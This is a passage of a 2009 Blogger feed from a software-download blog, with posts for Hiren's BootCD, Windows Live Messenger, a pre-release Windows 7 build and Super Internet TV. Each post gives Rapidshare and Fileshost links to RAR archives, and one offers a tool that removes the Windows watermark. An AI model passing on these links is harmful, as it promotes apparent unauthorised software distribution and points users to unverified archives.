here....'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nUlVy6CeF-o/SbjCWRBezEI/AAAAAAAAAE4/lURMhkdW59s/s72-c/0.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-7304314964233118104</id><published>2009-03-11T18:34:00.000-07:00</published><updated>2009-03-28T00:41:24.826-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Hiren's BootCD 9.8</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sbi37qVb-4I/AAAAAAAAAC4/6Kj-CcgtJwM/s1600-h/hiren.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 315px; height: 315px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sbi37qVb-4I/AAAAAAAAAC4/6Kj-CcgtJwM/s400/hiren.jpg" alt="" id="BLOGGER_PHOTO_ID_5312197996087868290" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sbi4Bz6FQ4I/AAAAAAAAADA/tXwW--nY2GQ/s1600-h/hiren1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 222px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sbi4Bz6FQ4I/AAAAAAAAADA/tXwW--nY2GQ/s400/hiren1.jpg" alt="" id="BLOGGER_PHOTO_ID_5312198101736702850" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sbi4TFEUh0I/AAAAAAAAADQ/9TZDQphCgwk/s1600-h/hiren12.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 222px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sbi4TFEUh0I/AAAAAAAAADQ/9TZDQphCgwk/s400/hiren12.jpg" alt="" id="BLOGGER_PHOTO_ID_5312198398400825154" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sbi4i1FNkiI/AAAAAAAAADY/k5D85bOjE-c/s1600-h/hiren123.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 222px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sbi4i1FNkiI/AAAAAAAAADY/k5D85bOjE-c/s400/hiren123.jpg" alt="" id="BLOGGER_PHOTO_ID_5312198668987503138" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sbi5D4ZT-dI/AAAAAAAAADo/R0tv_CM6RLg/s1600-h/hiren1234.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sbi5D4ZT-dI/AAAAAAAAADo/R0tv_CM6RLg/s400/hiren1234.jpg" alt="" id="BLOGGER_PHOTO_ID_5312199236812798418" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Hiren's Boot CD is a boot CD containing various diagnostic programs such as partitioning agents, system performance benchmarks, disk cloning and imaging tools, data recovery tools, MBR tools, BIOS tools, and many others for fixing various computer problems. It is a Bootable CD; thus, it can be useful even if the primary operating system cannot be booted. Hiren's Boot CD has an extensive list of software. Utilities with similar functionality on the CD are grouped together and seem redundant; however, they present choices through UI differences.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Hiren's BootCD 9.8&lt;br /&gt;&lt;br /&gt;+ ClamWin Antivirus (0803)&lt;br /&gt;+ ComboFix (0803)&lt;br /&gt;+ Samsung ESTOOL 2.11z&lt;br /&gt;+ ERD Explorer 2003&lt;br /&gt;+ XP Key Reader 2.7&lt;br /&gt;- McAfee Antivirus&lt;br /&gt;Acronis Disk Director 10.0.2160&lt;br /&gt;DriveImageXML 2.02&lt;br /&gt;IBM/Hitachi Drive Fitness Test 4.14&lt;br /&gt;Universal TCP/IP Network 6.4&lt;br /&gt;Ghost 11.5.0.2165&lt;br /&gt;Ghost Walker 11.5.0.2165&lt;br /&gt;Ghost Image Explorer 11.5.0.2165&lt;br /&gt;Partition Saving 3.71&lt;br /&gt;Seagate Seatools Graphical v2.13b&lt;br /&gt;Western Digital Data Lifeguard Tools 11.2&lt;br /&gt;Hard Disk Sentinel 0.04&lt;br /&gt;CPU Identification utility 1.16&lt;br /&gt;7-Zip 4.65&lt;br /&gt;Recuva 1.24.399&lt;br /&gt;Unstoppable Copier 4b&lt;br /&gt;Express Burn 4.25&lt;br /&gt;Process Explorer 11.33&lt;br /&gt;Autoruns 9.39&lt;br /&gt;CurrPorts 1.60&lt;br /&gt;CPU-Z 1.50&lt;br /&gt;SmitFraudFix 2.400&lt;br /&gt;CCleaner 2.17.853&lt;br /&gt;Shell Extensions Manager 1.36&lt;br /&gt;Xp-AntiSpy 3.97.2&lt;br /&gt;SIW 2009-02-24&lt;br /&gt;Spybot - Search &amp;amp; Destroy 1.6.2 (0803)&lt;br /&gt;SpywareBlaster 4.1(0803)&lt;br /&gt;PCI 32 Sniffer 1.4 (0803)&lt;br /&gt;Ad-Aware SE Personal 1.06 (0803)&lt;br /&gt;PCI and AGP info Tool (0803)&lt;br /&gt;Unknown Devices 1.2 (0803)&lt;br /&gt;&lt;br /&gt;Download:&lt;span style="color:red;"&gt;&lt;br /&gt;&lt;/span&gt;  Rapidshare:&lt;br /&gt;&lt;a href="http://rapidshare.com/files/207917752/Hirens.BootCD.9.8ByMessi.BR.part1.rar"&gt;http://rapidshare.com/files/207917752/Hirens.BootCD.9.8ByMessi.BR.part1.rar &lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/207919406/Hirens.BootCD.9.8ByMessi.BR.part2.rar"&gt;http://rapidshare.com/files/207919406/Hirens.BootCD.9.8ByMessi.BR.part2.rar &lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/207920115/Hirens.BootCD.9.8ByMessi.BR.part3.rar"&gt;http://rapidshare.com/files/207920115/Hirens.BootCD.9.8ByMessi.BR.part3.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Fileshost:&lt;br /&gt;&lt;a href="http://www.fileshost.com/download.php?id=5F7B50541"&gt;http://www.fileshost.com/download.php?id=5F7B50541 &lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.fileshost.com/download.php?id=8224C3091"&gt;http://www.fileshost.com/download.php?id=8224C3091 &lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.fileshost.com/download.php?id=72E5DA661"&gt;http://www.fileshost.com/download.php?id=72E5DA661&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-7304314964233118104?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/7304314964233118104/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=7304314964233118104' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/7304314964233118104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/7304314964233118104'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/hirens-bootcd-98.html' title='Hiren&apos;s BootCD 9.8'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_nUlVy6CeF-o/Sbi37qVb-4I/AAAAAAAAAC4/6Kj-CcgtJwM/s72-c/hiren.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-3312421382974646497</id><published>2009-03-10T04:57:00.000-07:00</published><updated>2009-03-28T00:41:18.150-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Windows Live Messenger v9.0</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SbZWDxXyt5I/AAAAAAAAACw/yFI54mBLZU4/s1600-h/14bic6e.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 218px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SbZWDxXyt5I/AAAAAAAAACw/yFI54mBLZU4/s400/14bic6e.jpg" alt="" id="BLOGGER_PHOTO_ID_5311527433322805138" border="0" /&gt;&lt;/a&gt;&lt;span style="color: rgb(192, 192, 192); font-weight: bold;"&gt;Windows Live Messenger v9.0 l +MsgPlusLive 460&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(192, 192, 192);"&gt;Sign-in and messaging in multiple locations - You asked for it, now you have it! You can now sign into Messenger from more than one computer at a time, up to four at once. Simply sign into Messenger from one computer, install Messenger on another computer and sign in using the same account. (Only works if all computers are running Messenger 9.0 Beta. Currently enabled only for users whose Windows Live ID country is US or Canada.)&lt;br /&gt;&lt;br /&gt;* Signature sounds ? Pick your own personal sound that your contacts will hear when you sign into Messenger (only works if you and your contacts have Messenger 9.0 Beta).&lt;br /&gt;* Per contact sounds - Pick unique sounds for each of your contacts. You will be able to tell from across the room who is sending you a message.&lt;br /&gt;* SPAM Reporting - If users send you unsolicited messages or invitations that you consider spam, you can block them and report them as spammers. If you report a user as a spammer, the messenger service will collect this data and put appropriate restrictions on the spammer accounts. All reports of spammers are kept confidential.&lt;br /&gt;* Animated Display Pictures ? Show your moves! Messenger now supports animated .gif files as display pictures.&lt;br /&gt;* Link in Personal Status Message ? URLs in Personal Status Messages are hot and clickable in the Messenger contact list.&lt;br /&gt;&lt;br /&gt;* Behind the Scenes Changes ? Architectural changes that modified how things work but shouldn?t have changed how things look&lt;br /&gt;* Changes to sign-in, connectivity, presence, sending text IM?s, voice &amp;amp; video features&lt;br /&gt;* Windows Live Contacts Server ? wlcomm.exe runs in the background to keep your contacts? information up-to-date and helps Messenger sign you in faster&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(192, 192, 192); font-weight: bold;"&gt;Download it:&lt;/span&gt;&lt;br /&gt;&lt;div style="color: rgb(192, 192, 192);" class="codecontent"&gt;&lt;a href="http://rapidshare.com/files/128980160/Windows_Live_Messenger_9.0_Final_MsgPlusLive-460.rar"&gt;http://rapidshare.com/files/128980160/Windows_Live_Messenger_9.0_Final_MsgPlusLive-460.rar&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SbZVw2vqPkI/AAAAAAAAACo/c-Yj_j3lNyw/s1600-h/14bic6e.jpg"&gt;&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-3312421382974646497?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/3312421382974646497/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=3312421382974646497' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3312421382974646497'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3312421382974646497'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/windows-live-messenger-v90.html' title='Windows Live Messenger v9.0'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nUlVy6CeF-o/SbZWDxXyt5I/AAAAAAAAACw/yFI54mBLZU4/s72-c/14bic6e.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-6073525766273105778</id><published>2009-03-10T03:54:00.000-07:00</published><updated>2009-04-06T20:21:03.120-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OS'/><title type='text'>Microsoft® Windows Se7ven (7) Build 7022</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SbZPLpHLFNI/AAAAAAAAACg/DwfVnAg6NEE/s1600-h/97d36ef4542ab8ead75455738f09.jpeg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 256px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SbZPLpHLFNI/AAAAAAAAACg/DwfVnAg6NEE/s320/97d36ef4542ab8ead75455738f09.jpeg" alt="" id="BLOGGER_PHOTO_ID_5311519871963174098" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/SbZPBwuF9LI/AAAAAAAAACY/-msBdxWqDpc/s1600-h/7022.jpeg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 256px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/SbZPBwuF9LI/AAAAAAAAACY/-msBdxWqDpc/s320/7022.jpeg" alt="" id="BLOGGER_PHOTO_ID_5311519702206772402" border="0" /&gt;&lt;/a&gt;Change logs:&lt;br /&gt;&lt;br /&gt;* The new sidebar color that was shown in previous screenshots. See below...&lt;br /&gt;* New Paint, as we saw in previous screenshots. See below...&lt;br /&gt;* HomeGroup gets a new icon. See below...&lt;br /&gt;* IE8 updated to RC1&lt;br /&gt;* Faster search in startmenu, instant.&lt;br /&gt;* General higher stability in OS&lt;br /&gt;* New animations when moving between things in Windows Explorer&lt;br /&gt;* Desktop Gadget Gallery is the new name for Sidebar. It gets a new icon!&lt;br /&gt;&lt;br /&gt;&lt;div class="codetitle"&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;/div&gt;&lt;div class="codecontent"&gt;&lt;a href="http://rapidshare.com/files/198277734/W7_x86_7022_UDS.sfv"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198277734/W7_x86_7022_UDS.sfv&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198280792/W7_x86_7022_UDS_www.funzspot.com.part01.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198280792/W7_x86_7022_UDS_www.funzspot.com.part01.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198283420/W7_x86_7022_UDS_www.funzspot.com.part02.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198283420/W7_x86_7022_UDS_www.funzspot.com.part02.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198284498/W7_x86_7022_UDS_www.funzspot.com.part03.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198284498/W7_x86_7022_UDS_www.funzspot.com.part03.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198284807/W7_x86_7022_UDS_www.funzspot.com.part04.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198284807/W7_x86_7022_UDS_www.funzspot.com.part04.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198285787/W7_x86_7022_UDS_www.funzspot.com.part05.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198285787/W7_x86_7022_UDS_www.funzspot.com.part05.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198285798/W7_x86_7022_UDS_www.funzspot.com.part06.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198285798/W7_x86_7022_UDS_www.funzspot.com.part06.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198286767/W7_x86_7022_UDS_www.funzspot.com.part07.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198286767/W7_x86_7022_UDS_www.funzspot.com.part07.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198286779/W7_x86_7022_UDS_www.funzspot.com.part08.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198286779/W7_x86_7022_UDS_www.funzspot.com.part08.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198287145/W7_x86_7022_UDS_www.funzspot.com.part09.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198287145/W7_x86_7022_UDS_www.funzspot.com.part09.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198287108/W7_x86_7022_UDS_www.funzspot.com.part10.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198287108/W7_x86_7022_UDS_www.funzspot.com.part10.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198292114/W7_x86_7022_UDS_www.funzspot.com.part11.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198292114/W7_x86_7022_UDS_www.funzspot.com.part11.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198292088/W7_x86_7022_UDS_www.funzspot.com.part12.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198292088/W7_x86_7022_UDS_www.funzspot.com.part12.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198292086/W7_x86_7022_UDS_www.funzspot.com.part13.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198292086/W7_x86_7022_UDS_www.funzspot.com.part13.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198292972/W7_x86_7022_UDS_www.funzspot.com.part14.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198292972/W7_x86_7022_UDS_www.funzspot.com.part14.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198294718/W7_x86_7022_UDS_www.funzspot.com.part15.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198294718/W7_x86_7022_UDS_www.funzspot.com.part15.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198294667/W7_x86_7022_UDS_www.funzspot.com.part16.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198294667/W7_x86_7022_UDS_www.funzspot.com.part16.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198294736/W7_x86_7022_UDS_www.funzspot.com.part17.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198294736/W7_x86_7022_UDS_www.funzspot.com.part17.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198294697/W7_x86_7022_UDS_www.funzspot.com.part18.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198294697/W7_x86_7022_UDS_www.funzspot.com.part18.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198297112/W7_x86_7022_UDS_www.funzspot.com.part19.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198297112/W7_x86_7022_UDS_www.funzspot.com.part19.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198296917/W7_x86_7022_UDS_www.funzspot.com.part20.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198296917/W7_x86_7022_UDS_www.funzspot.com.part20.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198296912/W7_x86_7022_UDS_www.funzspot.com.part21.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198296912/W7_x86_7022_UDS_www.funzspot.com.part21.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198301264/W7_x86_7022_UDS_www.funzspot.com.part22.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198301264/W7_x86_7022_UDS_www.funzspot.com.part22.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198301074/W7_x86_7022_UDS_www.funzspot.com.part23.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198301074/W7_x86_7022_UDS_www.funzspot.com.part23.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198300679/W7_x86_7022_UDS_www.funzspot.com.part24.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198300679/W7_x86_7022_UDS_www.funzspot.com.part24.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/198300264/W7_x86_7022_UDS_www.funzspot.com.part25.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198300264/W7_x86_7022_UDS_www.funzspot.com.part25.rar&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color:red;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Use this tool to remove send feedback and watemark &lt;/span&gt;&lt;br /&gt;&lt;div class="codetitle"&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;/div&gt;&lt;div class="codecontent"&gt;&lt;a href="http://rapidshare.com/files/198299835/Remove_feedback.rar"&gt;&lt;span style="color: rgb(70, 85, 132);" title="This link has not yet been checked."&gt;http://rapidshare.com/files/198299835/Remove_feedback.rar&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SbZOvCXdKZI/AAAAAAAAACQ/jnMR-T1UbU8/s1600-h/191b126d49add71ec842836a6cb6.jpeg"&gt;&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-6073525766273105778?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/6073525766273105778/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=6073525766273105778' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/6073525766273105778'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/6073525766273105778'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/microsoft-windows-se7ven-7-build-7022.html' title='Microsoft® Windows Se7ven (7) Build 7022'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nUlVy6CeF-o/SbZPLpHLFNI/AAAAAAAAACg/DwfVnAg6NEE/s72-c/97d36ef4542ab8ead75455738f09.jpeg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-2412077695086455188</id><published>2009-03-09T21:38:00.000-07:00</published><updated>2009-03-28T00:41:05.731-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Super Internet TV 7.4 (2009)</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/SbX0tmdbAyI/AAAAAAAAACI/wz4MvpWegWo/s1600-h/d5lbl.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 283px; height: 320px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/SbX0tmdbAyI/AAAAAAAAACI/wz4MvpWegWo/s320/d5lbl.jpg" alt="" id="BLOGGER_PHOTO_ID_5311420399808611106" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Super Internet TV allows you to watch 1900+ live television channels and listen to 5000+ online radio stations from 100+ countries. There is no need for a TV Tuner card because all the channels are streamed through your Internet connection. For most TV and Radio channels a modem speed of 56Kb/s is required, for the broadband TV stations you need 300 Kb/s. This software comes with automatic TV station updates so it will never be out of date. If you are interested in learning languages or alternative programming, this is a good choice for you!&lt;br /&gt;&lt;br /&gt;Features :&lt;br /&gt;&lt;br /&gt;More than 2200 FREE TV stations.&lt;br /&gt;More than 5000 FREE radio stations.&lt;br /&gt;More than 200 live webcams.&lt;br /&gt;NO TV tuner card required!&lt;br /&gt;Automatic channel list updates.&lt;br /&gt;Supports high bandwidth stations.&lt;br /&gt;Supports thousands of skins&lt;br /&gt;Resizable screen, including full-screen mode&lt;br /&gt;&lt;br /&gt;The most significant Super Internet TV features are:&lt;br /&gt;&lt;br /&gt;Various Channels: Channels include sports, entertainment, music, news, talk, radio and webcams from many different countries. There are even Television based on different languages including English, French, Spanish, German, Portuguese, and Arabic. These channels are streamed over the Internet for free and do not require any subscription.&lt;br /&gt;&lt;br /&gt;Simple and easy to use: Super Internet TV emulates the regular Television set on your PC. All you have to do is select a channel from the list and it will play in the main window. This application does not require any special configurations or settinngs in order to access all the channels. You can add selected channels to a Favorite list for faster access in the future.&lt;br /&gt;&lt;br /&gt;No additional hardware required: It does not require a TV Tuner card, since these programs are broadcasted over the Internet.&lt;br /&gt;&lt;br /&gt;Super Internet TV uses Windows Media Player's decoding system to present the television and radio signals. If you want to watch more channels which use RealVideo format, you also need RealPlayer installed. You don't have to care about the station's broadcasting format; it will switch automatically between formats. Super Internet TV works with any broadband Internet Service Provider (ISP) Worldwide.&lt;br /&gt;&lt;br /&gt;Super Internet TV supports resizable screen sizes; you can change the screen window to any size that you want, including full-screen mode. This software comes with free automatic TV station updates so it will never be out of date. It also supports thousands of skins (visual styles) .&lt;br /&gt;&lt;br /&gt;About the stations:&lt;br /&gt;Just like a TV set, live Internet television depends on the origin and not on the software that displays the TV images. Some stations can be off line due to their servers' overload or Internet traffic jams. Not all stations have a 24 Hours schedule. The video quality is dependent on the broadcaster's own bandwidth; the higher the bandwidth, the better the video quality you will receive. For most TV and radio channels, a modem speed of 56Kb/s is required. For the broadband TV stations, you need 300 Kb/s.&lt;br /&gt;&lt;br /&gt;Download :&lt;br /&gt;&lt;a href="http://rapidshare.com/files/200856016/App003-Farespnx.rar"&gt;http://rapidshare.com/files/200856016/App003-Farespnx.rar&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 